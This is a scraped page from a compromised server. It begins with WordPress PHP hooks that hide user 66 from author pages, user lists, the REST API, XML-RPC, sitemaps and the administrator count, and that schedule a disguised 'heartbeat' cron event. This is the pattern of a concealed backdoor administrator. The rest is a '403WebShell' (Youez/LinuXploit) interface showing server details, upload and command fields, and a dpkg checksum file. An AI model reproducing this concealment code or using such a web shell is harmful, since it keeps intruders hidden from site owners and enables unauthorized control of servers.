add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/ubuntu-drivers-common.md5sums
67e0c2037603c2da2a485cfa86967f21  usr/bin/nvidia-detector
f54e439224f661eb989f7609f7929dcd  usr/bin/quirks-handler
e2f3cf0ada7c9978ef2f80262678ccb5  usr/bin/ubuntu-drivers
4237ec1bb6c7f4dfc13996476498c2da  usr/lib/nvidia/alternate-install-available
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/NvidiaDetector/__init__.py
bbee537e7ec6619b57a6892e4ff37aba  usr/lib/python3/dist-packages/NvidiaDetector/alternatives.py
afd750404f5d432c6936d3d5493ea33a  usr/lib/python3/dist-packages/NvidiaDetector/nvidiadetector.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/Quirks/__init__.py
1befcbf66a6ff30be879f9dca26c2f18  usr/lib/python3/dist-packages/Quirks/quirkapplier.py
f24a748f493a7121c66be4796a99b400  usr/lib/python3/dist-packages/Quirks/quirkinfo.py
860c6e4dd419ee70b07a25c325b226d1  usr/lib/python3/dist-packages/Quirks/quirkreader.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/UbuntuDrivers/__init__.py
f86f37e84d5973d57ddaffd4b80e8190  usr/lib/python3/dist-packages/UbuntuDrivers/detect.py
42bf834a334d2817cd1f4bf3be4cc633  usr/lib/python3/dist-packages/UbuntuDrivers/kerneldetection.py
a660de0d0d89222a43939dffeb4f5450  usr/lib/python3/dist-packages/ubuntu_drivers_common-0.0.0.egg-info/PKG-INFO
68b329da9893e34099c7d8ad5cb9c940  usr/lib/python3/dist-packages/ubuntu_drivers_common-0.0.0.egg-info/dependency_links.txt
4956073fc028e6bc7b034b53a07ba81d  usr/lib/python3/dist-packages/ubuntu_drivers_common-0.0.0.egg-info/top_level.txt
2a8edfc97561ecc0c9aee7e96cc03fae  usr/lib/ubiquity/target-config/31ubuntu_driver_packages
752ae30c55f535c05935c8fca4bd6962  usr/share/apport/package-hooks/ubuntu-drivers-common.py
6167ab5fa554c08408922f22e9dfd8aa  usr/share/doc/ubuntu-drivers-common/README
02482929c3f41ac303bb61c66f4b538d  usr/share/doc/ubuntu-drivers-common/changelog.gz
a7525be9c6b978e6e3f60f64b75c4396  usr/share/doc/ubuntu-drivers-common/copyright
e52854ce3a686ae4cd7f55be40348337  usr/share/python3/runtime.d/ubuntu-drivers-common.rtupdate
3569224418bb3ca137a6cdd6a9fc20d0  usr/share/ubuntu-drivers-common/detect/arm-gles.py
87b1d0a01634565af32ba6832643c591  usr/share/ubuntu-drivers-common/detect/sl-modem.py
0299496e1a7b081e16f8330bba0ec72d  usr/share/ubuntu-drivers-common/fake-devices-wrapper
c7f70d8f691ac1aa58e3e386d93dc0ce  usr/share/ubuntu-drivers-common/obsolete
d43c1d79bbe24c55c07e93097c1ff379  usr/share/ubuntu-drivers-common/quirks/dell_latitude
f074e9e588daee536a9910c357643274  usr/share/ubuntu-drivers-common/quirks/lenovo_thinkpad
d41d8cd98f00b204e9800998ecf8427e  usr/share/ubuntu-drivers-common/quirks/put_your_quirks_here

Youez - 2016 - github.com/yon3zu
LinuXploit